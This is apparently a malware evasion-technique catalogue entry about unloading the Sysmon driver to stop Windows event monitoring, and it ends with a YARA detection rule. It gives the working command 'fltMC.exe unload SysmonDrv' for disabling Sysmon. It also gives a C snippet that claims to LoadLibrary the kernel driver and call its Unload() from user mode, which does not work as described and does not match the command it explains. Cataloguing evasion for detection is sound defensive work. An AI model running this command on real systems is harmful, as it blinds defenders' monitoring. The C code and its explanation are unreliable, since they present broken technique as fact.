Unloading Sysmon Driver

Created the Sunday 19 June 2022. Updated 9 months, 3 weeks ago.

Sysmon is a tool that can be used to monitor system activity on Windows systems. It records various types of events, such as process creation, network connections, and registry changes, and stores them in the Windows Event Log. Security analysts can use this information to detect and investigate malicious activity on a system.

One way that malware can evade detection by Sysmon is by unloading the Sysmon driver. The Sysmon driver is the kernel-mode component of Sysmon that is responsible for recording the events that Sysmon monitors. By unloading this driver, the malware can prevent Sysmon from recording any further events, and thus avoid being detected.

Technique Identifier

U0407

Technique Tags

Sysmon system activity process creation network connections registry changes Windows Event Log Sysmon driver

Featured Windows API's

Below, you will find a list of the most commonly used Windows API's that are currently utilized by malware authors for current evasion technique. This list is meant to provide an overview of the API's that are commonly used for this purpose. If there are any API's that you feel should be included on this list, please do not hesitate to contact us. We will be happy to update the list and provide any additional information or documentation that may be helpful.

GetProcAddress

Code Snippets

fltMC.exe unload SysmonDrv

Description

This code uses the LoadLibrary() and GetProcAddress() functions to load the Sysmon driver and get the address of its Unload() function. It then calls the Unload() function to unload the driver, which will cause Sysmon to stop recording events and thus evade detection by Sysmon. After the driver has been unloaded, the malware can proceed with its malicious actions without being monitored by Sysmon.

// Load the Sysmon driver
HMODULE hModule = LoadLibrary("sysmondrv");

// Check if the driver was loaded successfully
if (hModule != NULL)
{
    // Get the address of the driver's Unload() function
    PFN_UNLOAD pfnUnload = (PFN_UNLOAD) GetProcAddress(hModule, "Unload");

    // Check if the Unload() function was found
    if (pfnUnload != NULL)
    {
        // Call the Unload() function to unload the driver
        pfnUnload();

        // The Sysmon driver has been unloaded
        // Malware can now proceed with its malicious actions without being monitored by Sysmon
        // ...
    }
}

Detection Rules

                                    rule SysmonEvasion
{
    strings:
        // Check for the LoadLibrary() function call
        $load_library = "LoadLibrary"

        // Check for the GetProcAddress() function call
        $get_proc_address = "GetProcAddress"

        // Check for the Unload() function call
        $unload = "Unload"

        // Check for the sysmondrv string
        $sysmondrv = "sysmondrv"

    condition:
        // Check if all the required strings are present in the code
        all of them
}

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.

https://www.ired.team/offensive-security/defense-evasion/unloading-sysmon-driver